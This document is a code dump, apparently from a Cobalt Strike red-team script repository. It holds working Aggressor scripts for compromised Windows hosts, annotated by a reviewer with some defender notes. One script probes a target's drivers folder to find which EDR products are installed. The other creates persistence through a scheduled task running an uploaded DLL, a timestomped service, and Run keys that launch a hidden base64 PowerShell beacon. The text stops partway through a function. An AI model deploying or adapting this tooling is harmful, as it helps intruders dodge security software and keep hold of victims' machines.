## [hostname] (a host, IP, or "localhost") and [arch] ("x86" or "x64").
11 | beacon_command_register("edr_query", "Queries the remote or local system for all major EDR products installed",
12 | "Syntax: edr_query [hostname] [arch]\n" .
13 | "Checks the local or remote system for installed EDR products. **Note: Use localhost for [hostname] to query the local system**");
14 |
15 | ## edr_query alias
## Console handler: $1 = beacon id, $2 = target host or "localhost",
## $3 = architecture. Both arguments must be present; the handler then lists
## the target's drivers directory through the C$ admin share and hands the
## output to &list. A $3 other than "x64"/"x86" falls through with no output.
## $bid is assigned without `local`, so it is a global that &list reads later.
## The x86 branch lists sysnative instead of system32 — presumably to step
## around WOW64 file-system redirection for a 32-bit Beacon; confirm.
## Defender note: the remote form is an SMB directory read of \\<host>\C$;
## share-access auditing (Security 5140/5145, where enabled) is where it
## becomes visible.
16 | alias edr_query {
17 | $bid = $1;
18 | if ($2 is $null) {
19 | blog($bid, "\c4Please enter a remote hostname or localhost!");
20 | show_message("Please enter a remote hostname or localhost!");
21 | }
22 | else if ($3 is $null) {
23 | blog($bid, "\c4Please enter a valid architechture!");
24 | show_message("Please enter a valid architechture!");
25 | }
26 | else if ($3 ismatch 'x64') {
27 | blog($bid, "\cBDetermining what EDR products are installed on ". $2 ."...");
28 | bls($bid, "\\\\". $2 ."\\C\$\\windows\\system32\\drivers", &list);
29 | }
30 | else if ($3 ismatch 'x86') {
31 | blog($bid, "\cBDetermining what EDR products are installed on ". $2 ."...");
32 | bls($bid, "\\\\". $2 ."\\C\$\\windows\\sysnative\\drivers", &list);
33 | }
34 | }
35 |
## Opens the "EDR Query Menu" dialog for beacon $1. The hostname default text
## doubles as a sentinel that &EDR rejects if it is left unchanged; Arch is a
## combobox limited to "x86"/"x64". &EDR is the dialog's submit callback.
## $bid is set as a global here and read by &EDR and, through it, &list.
36 | sub query {
37 |
38 | $bid = $1;
39 | $dialog = dialog("EDR Query Menu", %(hostname => "Enter Remote HostName", Arch => ""), &EDR);
40 | dialog_description($dialog, "EDR Query Menu. Remotely query a system for EDR products. Hostname field (IP or Hostname) is Mandatory! **Note: Use localhost for the local system.**");
41 | drow_text($dialog, "hostname", "Target HostName:");
42 | drow_combobox($dialog, "Arch", "Target Architechture:", @("x86", "x64"));
43 | dbutton_action($dialog, "Execute");
44 | dialog_show($dialog);
45 |
46 | }
47 |
## Submit callback for the dialog built in &query. The values map is $3
## (keys "hostname" and "Arch"); $1 and $2 are not used here. Rejects the
## untouched hostname placeholder, otherwise issues the same drivers-directory
## listing as `alias edr_query` (here the listing is queued before the status
## message). Relies on the global $bid set in &query; if the dialog is opened
## for several beacons in turn, the value seen here is whichever was set
## last — verify that is acceptable.
48 | sub EDR {
49 |
50 | if ($3['hostname'] ismatch 'Enter Remote HostName') {
51 | show_message("Please enter a remote hostname or localhost!");
52 | blog($bid, "\c4Please enter a remote hostname or localhost!");
53 | }
54 | else if ($3['Arch'] ismatch 'x86') {
55 | bls($bid, "\\\\". $3['hostname'] ."\\C\$\\windows\\sysnative\\drivers", &list);
56 | blog($bid, "\cBDetermining what EDR products are installed on ". $3['hostname']. "...");
57 | }
58 | else if ($3['Arch'] ismatch 'x64') {
59 | bls($bid, "\\\\". $3['hostname'] ."\\C\$\\windows\\system32\\drivers", &list);
60 | blog($bid, "\cBDetermining what EDR products are installed on ". $3['hostname']. "...");
61 | }
62 |
63 | }
64 |
65 | #Parse dem results
## Callback for &bls: $3 is the raw directory listing, one entry per line,
## with tab-separated type/size/modified/name fields. Every name that appears
## in @edr is collected into @matches (a global, as is @results); a count
## banner is printed when at least one name matched, and the vendor checks
## below map driver names to a product label. $bid is the global set by the
## caller (&query or the edr_query alias), not a parameter of this callback.
## Defender note: the product labels printed here are what an operator acts
## on; the observable event is the remote listing itself, not this parsing.
66 | sub list {
67 |
68 | local('$entry $type $size $modified $name $out');
## One entry per line; only the trailing $name field is used.
69 | @results = split("\n", ["$3" trim]);
70 | @matches = @();
71 | foreach $entry (@results) {
72 | ($type, $size, $modified, $name) = split("\t", $entry);
73 | if ($name in @edr) {
74 | blog($bid, "\cB$name Found");
75 | add(@matches, $name, 0);
76 | }
77 | }
78 |
## Reuses the local $size that held the per-entry file size in the loop.
79 | $size = size(@matches);
80 |
81 | ## Print banner
82 | $out .= "\c4$size EDR Products Found!\n";
83 | $out .= " \c0======================\n";
84 | $out .= " | Vendor Information | \n";
85 | $out .= "\c0 ----------------------";
86 |
87 | ## Initial error checking
## `clear(@matches)` here only runs when the array is already empty.
88 | if (size(@matches) == 0) {
89 | blog($bid, "\c9No EDR products found! Operate at your own risk!");
90 | clear(@matches);
91 | }
92 | if (size(@matches) > 0) {
93 | blog($bid, $out);
94 | }
95 |
96 | ## Driver checking
## Each block below tests @matches for a vendor's driver names and prints
## one line per vendor; a driver can match several vendors if it is listed
## under more than one.
97 |
98 | ### Absolute
99 | if ('psepfilter.sys' in @matches || 'cve.sys' in @matches || 'cbfsfilter2017.sys' in @matches) {
100 | blog($bid, "Absolute Found!");
101 | }
102 |
103 | ### Altiris (Symantec)
104 | if ('atrsdfw.sys' in @matches) {
105 | blog($bid, "Altiris (Symantec) Found!");
106 | }
107 |
108 | ### Avast
109 | if ('aswSP.sys' in @matches || 'naswSP.sys' in @matches) {
110 | blog($bid, "Avast Found!");
111 | }
112 |
113 | ### AVG Technologies
114 | if ('avgtpx86.sys' in @matches || 'avgtpx64.sys' in @matches) {
115 | blog($bid, "AVG Technologies Found!");
116 | }
117 |
118 | ## BitDefender
119 | if ('edrsensor.sys' in @matches || 'hbflt.sys' in @matches || 'bdsvm.sys' in @matches || 'gzflt.sys' in @matches || 'bddevflt.sys' in @matches || 'AVCKF.SYS' in @matches || 'Atc.sys' in @matches || 'AVC3.SYS' in @matches || 'TRUFOS.SYS' in @matches || 'BDSandBox.sys' in @matches) {
120 | blog($bid, "BitDefender Found!");
121 | }
122 |
123 | ## Bromium
124 | if ('brfilter.sys' in @matches || 'BrCow_x_x_x_x.sys' in @matches || 'bemk.sys' in @matches) {
125 | blog($bid, "Bromium Found!");
126 | }
127 |
128 | ### Carbon Black
129 | if ('CarbonBlackK.sys' in @matches || 'carbonblackk.sys' in @matches || "Parity.sys" in @matches || "cbk7.sys" in @matches || "cbstream.sys" in @matches || "ctifile.sys" in @matches) {
130 | blog($bid, "Carbon Black Found!");
131 | }
132 |
133 | ### Check Point Software Technologies
134 | if ('epregflt.sys' in @matches || 'medlpflt.sys' in @matches || 'dsfa.sys' in @matches || 'cposfw.sys' in @matches || 'epklib.sys' in @matches) {
135 | blog($bid, "Check Point Software Technologies Found!");
136 | }
137 |
138 | ### Cisco AMP
139 | if ('CiscoAMPCEFWDriver.sys' in @matches || 'CiscoAMPHeurDriver.sys' in @matches) {
140 | blog($bid, "Cisco AMP Found!")
141 | }
142 |
143 | ### Cisco Secure Endpoint
144 | if ('csacentr.sys' in @matches || 'csaenh.sys' in @matches || 'csareg.sys' in @matches || 'csascr.sys' in @matches || 'csaav.sys' in @matches || 'csaam.sys' in @matches) {
145 | blog($bid, "Cisco Found!");
146 | }
147 |
148 | ### CJSC Returnil Software
149 | if ('rvsavd.sys' in @matches) {
150 | blog($bid, "CJSC Returnil Software Found!");
151 | }
152 |
153 | ### Comodo Security Solutions
154 | if ('cfrmd.sys' in @matches || 'cmdccav.sys' in @matches || 'cmdguard.sys' in @matches || 'CmdMnEfs.sys' in @matches || 'MyDLPMF.sys' in @matches) {
155 | blog($bid, "Comodo Security Solutions Found!");
156 | }
157 |
158 | ### CrowdStrike
159 | if ('im.sys' in @matches || 'CSAgent.sys' in @matches || 'CSBoot.sys' in @matches || 'CSDeviceControl.sys' in @matches || 'cspcm2.sys' in @matches) {
160 | blog($bid, "CrowdStrike Found!");
161 | }
162 |
163 | ### CyberArk
164 | if ('CybKernelTracker.sys' in @matches || 'vfdrv.sys' in @matches || 'vfnet.sys' in @matches || 'vfpd.sys' in @matches ) {
165 | blog($bid, "CyberArk Software Found!");
166 | }
167 |
168 | ### Cybereason
169 | if ('CRExecPrev.sys' in @matches) {
170 | blog($bid, "Cybereason Found!");
171 | }
172 |
173 | ### Cylance Inc.
174 | if ('CyOptics.sys' in @matches || 'CyProtectDrv32.sys' in @matches || 'CyProtectDrv64.sys' in @matches) {
175 | blog($bid, "Cylance Inc. Found!");
176 | }
177 |
178 | ### Dell Secureworks
179 | if ('groundling32.sys' in @matches || 'groundling64.sys' in @matches) {
180 | blog($bid, "Dell Secureworks Found!");
181 | }
182 |
183 | ### Elastic Security for Endpoint
184 | if ('ElasticEndpoint.sys' in @matches || 'ElasticEndpointDriver.sys' in @matches) {
185 | blog($bid, "Elastic Security for Endpoint detected!")
186 | }
187 |
188 | ### Endgame
189 | if ('esensor.sys' in @matches) {
190 | blog($bid, "Endgame Found!");
191 | }
192 |
193 | ### ESET
194 | if ('edevmon.sys' in @matches || 'ehdrv.sys' in @matches || 'eamonm.sys' in @matches || 'ekbdflt.sys' in @matches) {
195 | blog($bid, "ESET Found!");
196 | }
197 |
198 | ### FireEye
199 | if ('FeKern.sys' in @matches || 'WFP_MRT.sys' in @matches) {
200 | blog($bid, "FireEye Found!");
201 | }
202 |
203 | ### F-Secure
204 | if ('xfsgk.sys' in @matches || 'fsgk.sys' in @matches || 'fsatp.sys' in @matches || 'fshs.sys' in @matches) {
205 | blog($bid, "F-Secure Found!");
206 | }
207 |
208 | ### Hexis Cyber Solutions
209 | if ('HexisFSMonitor.sys' in @matches) {
210 | blog($bid, "Hexis Cyber Solutions Found!");
211 | }
212 |
213 | ### Kaspersky
214 | if ('klifks.sys' in @matches || 'klifaa.sys' in @matches || 'Klifsm.sys' in @matches) {
215 | blog($bid, "Kaspersky Found!");
216 | }
217 |
218 | ### LogRhythm
219 | if ('LRAgentMF.sys' in @matches) {
220 | blog($bid, "LogRhythm Found!");
221 | }
222 |
223 | ### Malwarebytes
224 | if ('mbamwatchdog.sys' in @matches) {
225 | blog($bid, "Malwarebytes Found!");
226 | }
227 |
228 | ### McAfee
229 | if ('mfeaskm.sys' in @matches || 'mfencfilter.sys' in @matches || 'epdrv.sys' in @matches || 'mfencoas.sys' in @matches || 'mfehidk.sys' in @matches || 'swin.sys' in @matches || 'hdlpflt.sys' in @matches || 'mfprom.sys' in @matches || 'MfeEEFF.sys' in @matches) {
230 | blog($bid, "McAfee Found!");
231 | }
232 |
233 | ### OPSWAT Inc
234 | if ('libwamf.sys' in @matches) {
235 | blog($bid, "OPSWAT Inc Found!");
236 | }
237 |
238 | ### Palo Alto
239 | if ('telam.sys' in @matches) {
240 | blog($bid, "Palo Alto Cortex Found!");
241 | }
242 |
243 | ### Panda Security
244 | if ('PSINPROC.SYS' in @matches || 'PSINFILE.SYS' in @matches || 'amfsm.sys' in @matches || 'amm8660.sys' in @matches || 'amm6460.sys' in @matches) {
245 | blog($bid, "Panda Security Found!");
246 | }
247 |
248 | ### Raytheon Cyber Solutions
249 | if ('eaw.sys' in @matches) {
250 | blog($bid, "Raytheon Cyber Solutions Found!");
251 | }
252 |
253 | ### SAFE-Cyberdefense
254 | if ('SAFE-Agent.sys' in @matches) {
255 | blog($bid, "SAFE-Cyberdefense Found!");
256 | }
257 |
258 | ### SentinelOne
259 | if ('SentinelMonitor.sys' in @matches) {
260 | blog($bid, "SentinelOne Found!");
261 | }
262 |
263 | ### Sophos
264 | if ('SAVOnAccess.sys' in @matches || 'savonaccess.sys' in @matches || 'sld.sys' in @matches || 'SophosED.sys' in @matches || 'sntp.sys' in @matches || 'swi_callout.sys' in @matches || 'hmpalert.sys' in @matches || 'sdcfilter.sys' in @matches || 'SophosBootDriver.sys' in @matches) {
265 | blog($bid, "Sophos Found!");
266 | }
267 |
268 | ### Symantec
269 | if ('pgpwdefs.sys' in @matches || 'GEProtection.sys' in @matches || 'diflt.sys' in @matches || 'sysMon.sys' in @matches || 'ssrfsf.sys' in @matches || 'emxdrv2.sys' in @matches || 'reghook.sys' in @matches || 'spbbcdrv.sys' in @matches || 'bhdrvx86.sys' in @matches || 'bhdrvx64.sys' in @matches || 'SISIPSFileFilter.sys' in @matches || 'symevent.sys' in @matches || 'vxfsrep.sys' in @matches || 'VirtFile.sys' in @matches || 'SymAFR.sys' in @matches || 'symefasi.sys' in @matches || 'symefa.sys' in @matches || 'symefa64.sys' in @matches || 'SymHsm.sys' in @matches || 'evmf.sys' in @matches || 'GEFCMP.sys' in @matches || 'VFSEnc.sys' in @matches || 'pgpfs.sys' in @matches || 'fencry.sys' in @matches || 'symrg.sys' in @matches) {
270 | blog($bid, "Symantec Found!");
271 | }
272 |
273 | ### Trend Micro
274 | if ('TMUMS.sys' in @matches || 'hfileflt.sys' in @matches || 'TMUMH.sys' in @matches || 'AcDriver.sys' in @matches || 'SakFile.sys' in @matches || 'SakMFile.sys' in @matches || 'fileflt.sys' in @matches || 'TmEsFlt.sys' in @matches || 'tmevtmgr.sys' in @matches || 'TmFileEncDmk.sys' in @matches) {
275 | blog($bid, "Trend Micro Inc Found!");
276 | }
277 |
278 | ### Verdasys
279 | if ('dgdmk.sys' in @matches || 'ndgdmk.sys' in @matches) {
280 | blog($bid, "Verdasys Inc. Found!");
281 | }
282 |
283 | ### Webroot
284 | if ('ssfmonm.sys' in @matches) {
285 | blog($bid, "Webroot Software, Inc. Found!");
286 | }
287 |
288 | }
289 |
## Adds an "EDR Query" entry at the bottom of the Beacon context menu.
## $1 is the current selection and is passed to &query as-is; the sibling
## Persistence_Menu.cna iterates its $1 per beacon instead — verify that the
## b* calls downstream accept the selection in this form.
290 | popup beacon_bottom {
291 | item "EDR Query" {
292 | query($1);
293 | }
294 | }
295 |
--------------------------------------------------------------------------------
/Persistence/Persistence_Menu.cna:
--------------------------------------------------------------------------------
1 | #Persistence Menu
2 | #Author: @r3dQu1nn
3 | #Beacon menu for common methods used for Persistence
4 |
# "Red Team > Persistence" submenu on the Beacon context menu. $1 is the
# selection of beacon ids; every item loops over it and calls one handler per
# beacon. persistUserSchtasks, persistCustomService, persistRegistryHKCU and
# persistRegistryHKLM are defined in this file; the other handlers are
# expected from sibling scripts. Items gated on -isadmin report an error
# otherwise, but that error is sent with the whole selection ($1) rather than
# the current $bid. The HKLM Run Key item is not gated on -isadmin although
# the handler's title describes it as user level — confirm what is intended.
5 | popup beacon_top {
6 | menu "&Red Team"{
7 | #Persistence Menu
8 | menu "&Persistence" {
9 | item "&Schtasks Persistence" {
10 | local('$bid');
11 | foreach $bid ($1) {
12 | persistUserSchtasks($bid);
13 | }
14 | }
15 | item "&Service EXE Persistence" {
16 | local('$bid');
17 | foreach $bid ($1) {
18 | if (-isadmin $bid) {
19 | persistCustomService($bid);
20 | }
21 | else {
22 | berror($1, "\c4Persistence Requires Admin Level Privileges");
23 | }
24 | }
25 | }
26 | item "&Registry Persistence" {
27 | local('$bid');
28 | foreach $bid ($1) {
29 | persistRegistry($bid);
30 | }
31 | }
32 | item "&HKCU Run Key Registry PowerShell Persistence" {
33 | local('$bid');
34 | foreach $bid ($1) {
35 | persistRegistryHKCU($bid);
36 | }
37 | }
38 | item "&HKLM Run Key Registry PowerShell Persistence" {
39 | local('$bid');
40 | foreach $bid ($1) {
41 | persistRegistryHKLM($bid);
42 | }
43 | }
44 | item "&WMI Event Persistence using PowerShell" {
45 | local('$bid');
46 | foreach $bid ($1) {
47 | if (-isadmin $bid) {
48 | persistwmievent($bid);
49 | }
50 | else {
51 | berror($1, "\c4Persistence Requires Admin Level Privileges");
52 | }
53 | }
54 | }
55 | item "&WMI Event Persistence using WMIC" {
56 | local('$bid');
57 | foreach $bid ($1) {
58 | if (-isadmin $bid) {
59 | persistwmieventwmic($bid);
60 | }
61 | else {
62 | berror($1, "\c4Persistence Requires Admin Level Privileges");
63 | }
64 | }
65 | }
66 | item "&Startup Script Local GPO Persistence" {
67 | local('$bid');
68 | foreach $bid ($1) {
69 | if (-isadmin $bid) {
70 | persistStartupGPO($bid);
71 | }
72 | else {
73 | berror($1, "\c4Persistence Requires Admin Level Privileges");
74 | }
75 | }
76 | }
77 | item "&Stickykeys(OSK) BackDoor Persistence (Need RDP Open)" {
78 | local('$bid');
79 | foreach $bid ($1) {
80 | stickykeys($bid);
81 | }
82 | }
83 | item "&Windows Startup Persistence"{
84 | local('$bid');
85 | foreach $bid ($1) {
86 | persistThroughStartUpFolder($bid);
87 | }
88 | }
89 | }
90 | }
91 | }
92 |
93 |
94 | #User Schtasks Persistence
95 | #Author: @r3dQu1nn
96 | #Runs as current user for the selected beacon
97 | #Meant for quick user level persistence upon initial access
98 | #Thanks to @noone and bluescreenofjeff for help
# Opens a dialog for beacon $1. Each field's default text is a sentinel; if
# any is left unchanged the callback reports an error and does nothing else.
# Otherwise the callback changes directory to targetpath, uploads the chosen
# DLL, registers a scheduled task through powerpick whose action is rundll32
# on that DLL (entry point StartW) under the given user and schedule, and
# then queries the task back. The file name on the target is the last "/"
# component of the local path. $bid is read by the lambda as a global, not a
# captured value. The `break` in the error branch is not inside a loop;
# presumably meant as an early return — verify what Sleep does with it here.
# Defender note: the artifacts are a new DLL under targetpath and a task
# registration (Security 4698 / Task Scheduler operational log, where
# audited) whose action is rundll32 <path>,StartW.
99 |
100 | sub persistUserSchtasks {
101 | $bid = $1;
102 | $dialog = dialog("User Schtasks Persistence", %(taskname => "Evil Task Name..", targetpath => "Target Path..", user => "User to Run as..", schedule => "Schedule modifier..", payloadfile => "Select DLL Payload.."), lambda({
103 | if ("$3['taskname']" ismatch 'Evil Task Name..' || "$3['targetpath']" ismatch 'Target Path..' || "$3['payloadfile']" ismatch 'Select DLL Payload..' || "$3['user']" ismatch 'User to Run as..' || "$3['schedule']" ismatch 'Schedule modifier..') {
104 | berror($bid, "\c4Please enter a valid Task Name, Target Path, and a valid Payload File.");
105 | break;
106 | }
107 | else {
108 | bcd($bid, $3['targetpath']);
109 | bupload($bid, $3['payloadfile']);
110 | bpowerpick($bid, 'schtasks /create /tn "'.$3['taskname'].'" /tr "C:\Windows\System32\rundll32.exe '.$3['targetpath']."\\".split("/",$3['payloadfile'])[-1].',StartW" /ru "'.$3['user'].'" /sc "'.$3['schedule'].'"');
111 | bpowerpick($bid, 'schtasks /query /v /tn "'.$3['taskname'].'" /FO list');
112 | }
113 | }));
114 |
115 | dialog_description($dialog, "User Schtasks Persistence - Generates a schtask for persistence on selected beacon.");
116 |
117 | drow_text($dialog, "taskname", "Schtasks Taskname:");
118 | drow_text($dialog, "user", "User to Run as:");
119 | drow_text($dialog, "targetpath", "Target Path:");
120 | drow_text($dialog, "schedule", "Schedule Modifier:");
121 | drow_file($dialog, "payloadfile", "DLL Payload:");
122 |
123 | dbutton_action($dialog, "Create");
124 | dialog_show($dialog);
125 |
126 | }
127 |
128 | #Admin Level Custom Service EXE Persistence
129 | #Author: @r3dQu1nn
130 | #Runs as elevated user/SYSTEM for the selected beacon
# Dialog-driven service install for beacon $1; every field defaults to
# sentinel text that the callback rejects if unchanged. On submit: cd to
# targetpath, upload the payload, timestomp, then via powerpick `sc delete`,
# `sc create` (auto start, DisplayName set), `sc description`, `sc start`.
# Risk: `sc delete <servicename>` runs unconditionally before the create,
# with no check that the name is free — a name that collides with an
# existing service removes that service. The `break` in the error branch is
# outside any loop. $bid is read by the lambda as a global.
# Defender note: the artifacts are a service installation (System 7045 /
# Security 4697 where audited) whose binary is a fresh EXE under targetpath.
131 |
132 | sub persistCustomService {
133 | $bid = $1;
134 | $dialog = dialog("Admin Level Custom Service EXE Persistence", %(servicename => "Custom Service Name..", display => "Display Name for Custom Service..", description => "Description for Custom Service..", targetpath => "Target Path..", payloadfile => "Select Payload.."), lambda({
135 | if ("$3['servicename']" ismatch 'Custom Service Name..' || "$3['targetpath']" ismatch 'Target Path..' || "$3['display']" ismatch 'Display Name for Custom Service..' || "$3['description']" ismatch 'Description for Custom Service..' || "$3['payloadfile']" ismatch 'Select Payload..') {
136 | berror($bid, "\c4Please enter a valid Custom Service Name, Target Path, Display Name, Description and Payload File.");
137 | break;
138 | }
139 | else {
140 | bcd($bid, $3['targetpath']);
141 | bupload($bid, $3['payloadfile']);
142 | btimestomp($bid, "$3['payloadfile']", "C:\\Windows\\System32\\cmd.exe");
143 | bpowerpick($bid, 'sc delete '.$3['servicename'].'');
144 | bpowerpick($bid, 'sc create '.$3['servicename'].' binpath= "'.$3['targetpath']."\\".split("/",$3['payloadfile'])[-1].'" error= ignore start= auto DisplayName= "'.$3['display'].'"');
145 | bpowerpick($bid, 'sc description '.$3['servicename'].' "'.$3['description'].'"');
146 | bpowerpick($bid, 'sc start '.$3['servicename'].'');
147 | }
148 | }));
149 | dialog_description($dialog, "Generates a Custom Service for Admin Level persistence on selected beacon. **Only Service EXE Payloads should be used**");
150 |
151 | drow_text($dialog, "servicename", "Custom Service Name:");
152 | drow_text($dialog, "display", "Display Name for Custom Service:");
153 | drow_text($dialog, "description", "Description for Custom Service:");
154 | drow_text($dialog, "targetpath", "Target/Bin Path:");
155 | drow_file($dialog, "payloadfile", "Payload:");
156 |
157 | dbutton_action($dialog, "Create");
158 | dialog_show($dialog);
159 |
160 | }
161 |
162 | #HKCU Run Key Registry PowerShell Persistence
163 | #Author: @r3dQu1nn
164 | #Generates a powershell Base64 Encoded payload as a HKCU Run Key Registry Entry for persistence on selected beacon based off a HTTP/HTTPS Listener
165 | #Big thanks to @christruncer and @merrillmatt011 for the help and code snippets
166 | #Fileless Registry Persistence using PowerShell
# Returns the base64 of the PowerShell artifact for the first listener whose
# lower-cased name contains "http" (that test already covers "https", so the
# second one is redundant). The argument callers pass ($bid) is unused.
# Falls off the end — i.e. returns $null — when no listener name matches,
# and the callers do not check for that. Duplicated verbatim as
# payloadgenerate1 further down.
167 |
168 | sub payloadgenerate {
169 | foreach $name (listeners()) {
170 | $original_listener = $name;
171 | $listener_name = lc($name);
172 | if ($listener_name hasmatch "http" || $listener_name hasmatch "https") {
173 | $data = artifact($original_listener, "powershell");
174 | return base64_encode($data);
175 | }
176 | }
177 | }
178 |
# Dialog for beacon $1: two Run-key value names, both sentinel-checked.
# On submit: (1) stores the base64 payload from &payloadgenerate as a String
# value under HKCU\...\Run, (2) stores a second Run value whose data is a
# SysWOW64 (32-bit) powershell.exe command line that reads value (1) back,
# decodes it and IEX's it, then (3) reads both values back for verification.
# All four commands use the "!" variant of bpowerpick, which I believe is the
# quieter form that does not echo the tasking to the console — confirm.
# $bid is read by the lambda as a global. The `break` in the error branch is
# outside any loop.
# Defender note: the artifacts are two new HKCU Run values, one holding a
# long base64 blob and one a `powershell.exe -w hidden ... FromBase64String`
# command line; registry value-set telemetry (e.g. Sysmon event 13) and
# autorun inspection both surface this.
179 | sub persistRegistryHKCU {
180 | $bid = $1;
181 | $dialog = dialog("HKCU Run Key Registry PowerShell Persistence (User Level)", %(keyname => "Key Name for Payload..", keyname1 => "Key Name to execute Payload.."), lambda({
182 | if ("$3['keyname']" ismatch 'Key Name for Payload..' || "$3['keyname1']" ismatch 'Key Name to execute Payload..') {
183 | berror($bid, "\c4Please enter valid Registry Key Names.");
184 | break;
185 | }
186 | else {
187 | $data = payloadgenerate($bid);
188 | $powershellcmd = "Set-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."' -Type String -Value \"".$data."\"";
189 | bpowerpick!($bid, $powershellcmd);
190 | blog($bid, "\cBSetting the first HKCU Run Key Value as '".$3['keyname']."'...");
191 | $powershellcmd1 = "Set-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."' -Value 'C:\\Windows\\SySWoW64\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden -c (IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run ".$3['keyname'].").".$3['keyname']."))))'";
192 | bpowerpick!($bid, $powershellcmd1);
193 | blog($bid, "\cBSetting the second HKCU Run Key Value as '".$3['keyname1']."'...");
194 | blog($bid, "\cBDisplaying both Run Keys to Verify everything worked as intended...");
195 | $powershellcmd2 = "Get-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."'";
196 | bpowerpick!($bid, $powershellcmd2);
197 | $powershellcmd3 = "Get-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."'";
198 | bpowerpick!($bid, $powershellcmd3);
199 | }
200 | }));
201 |
202 | dialog_description($dialog, "HKCU Run Key Registry PowerShell Persistence - Generates a powershell Base64 Encoded payload as a HKCU Run Key Registry Entry for persistence on selected beacon.");
203 |
204 | drow_text($dialog, "keyname", "Registry Key Name for Payload:");
205 | drow_text($dialog, "keyname1", "Registry Key Name to execute Payload:");
206 |
207 | dbutton_action($dialog, "Create");
208 | dialog_show($dialog);
209 |
210 | }
211 |
212 | #HKLM Run Key Registry PowerShell Persistence
213 | #Author: @r3dQu1nn
214 | #Generates a powershell Base64 Encoded payload as a HKLM Run Key Registry Entry for persistence on selected beacon based off a HTTP/HTTPS Listener
# Identical to &payloadgenerate above: same listener selection (first name
# containing "http"), same base64 artifact return, same unused argument and
# same $null result when nothing matches. In this file it is called only by
# persistRegistryHKLM; the two could share one function.
215 |
216 | sub payloadgenerate1 {
217 | foreach $name (listeners()) {
218 | $original_listener = $name;
219 | $listener_name = lc($name);
220 | if ($listener_name hasmatch "http" || $listener_name hasmatch "https") {
221 | $data = artifact($original_listener, "powershell");
222 | return base64_encode($data);
223 | }
224 | }
225 | }
226 |
#Dialog-driven HKLM Run-key persistence.
#  $1 - beacon id; captured as $bid by the dialog callback below.
#The callback receives the dialog values in $3 ('keyname', 'keyname1'); a field still holding
#its placeholder text is treated as invalid and nothing is written.
#Two values are written under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run:
#  - $3['keyname']  holds the base64 PowerShell artifact returned by payloadgenerate1 (-Type String)
#  - $3['keyname1'] holds a command line for the hard-coded SysWoW64 (32-bit) powershell.exe that
#    reads $3['keyname'] back with Get-ItemProperty (gp), base64-decodes it and runs it with IEX
#Both values are then read back with Get-ItemProperty so the result can be verified in the log.
#NOTE(review): the dialog title says "(User Level)", but every path below is HKLM:, and the
#error text mentions a Payload and a Path the dialog has no fields for.
#NOTE(review): payloadgenerate1 returns no value when no listener name contains "http"; that
#case is not checked here, so an empty value would be written.
227 | sub persistRegistryHKLM {
228 | $bid = $1;
229 | $dialog = dialog("HKLM Run Key Registry PowerShell Persistence (User Level)", %(keyname => "Key Name for Payload..", keyname1 => "Key Name to execute Payload.."), lambda({
230 | if ("$3['keyname']" ismatch 'Key Name for Payload..' || "$3['keyname1']" ismatch 'Key Name to execute Payload..') {
231 | berror($bid, "\c4Please enter a valid Registry Key Names, Payload, and a valid Path location.");
232 | break;
233 | }
234 | else {
235 | $data = payloadgenerate1($bid);
236 | $powershellcmd = "Set-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."' -Type String -Value \"".$data."\"";
237 | bpowerpick!($bid, $powershellcmd);
238 | blog($bid, "\cBSetting the first HKLM Run Key Value as '".$3['keyname']."'...");
239 | $powershellcmd1 = "Set-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."' -Value 'C:\\Windows\\SySWoW64\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden -c (IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((gp HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run ".$3['keyname'].").".$3['keyname']."))))'";
240 | bpowerpick!($bid, $powershellcmd1);
241 | blog($bid, "\cBSetting the second HKLM Run Key Value as '".$3['keyname1']."'...");
242 | blog($bid, "\cBDisplaying both Run Keys to Verify everything worked as intended...");
243 | $powershellcmd2 = "Get-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."'";
244 | bpowerpick!($bid, $powershellcmd2);
245 | $powershellcmd3 = "Get-ItemProperty -Path 'HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."'";
246 | bpowerpick!($bid, $powershellcmd3);
247 | }
248 | }));
249 |
250 | dialog_description($dialog, "HKLM Run Key Registry PowerShell Persistence - Generates a powershell Base64 Encoded payload as a HKLM Run Key Registry Entry for persistence on selected beacon.");
251 |
252 | drow_text($dialog, "keyname", "Registry Key Name for Payload:");
253 | drow_text($dialog, "keyname1", "Registry Key Name to execute Payload:");
254 |
255 | dbutton_action($dialog, "Create");
256 | dialog_show($dialog);
257 |
258 | }
259 |
260 | #Registry Persistence
261 | #Author: @r3dQu1nn
262 | #Depending on Registry Location elevated access might be required
263 |
#Generic registry persistence: one 'reg add' built from operator-supplied location, value
#name, type and data, followed by a 'reg query' of the location for verification.
#  $1 - beacon id; captured as $bid by the dialog callback.
#The callback receives $3['reglocation'], $3['keyname'], $3['datatype'] and $3['keyvalue'];
#a field still holding its placeholder text aborts with an error.
#The four values are dropped into the command line inside double quotes with no escaping,
#so a '"' in any field breaks the command. '/f' overwrites an existing value without a prompt.
#HKLM\ locations generally need an elevated beacon (see the dialog description).
264 | sub persistRegistry {
265 | $bid = $1;
266 | $dialog = dialog("Registry Persistence", %(reglocation => "Registry Location..", keyname => "Key Name..", datatype => "Data Type..(REG_SZ)", keyvalue => "Key Value..(Payload)"), lambda({
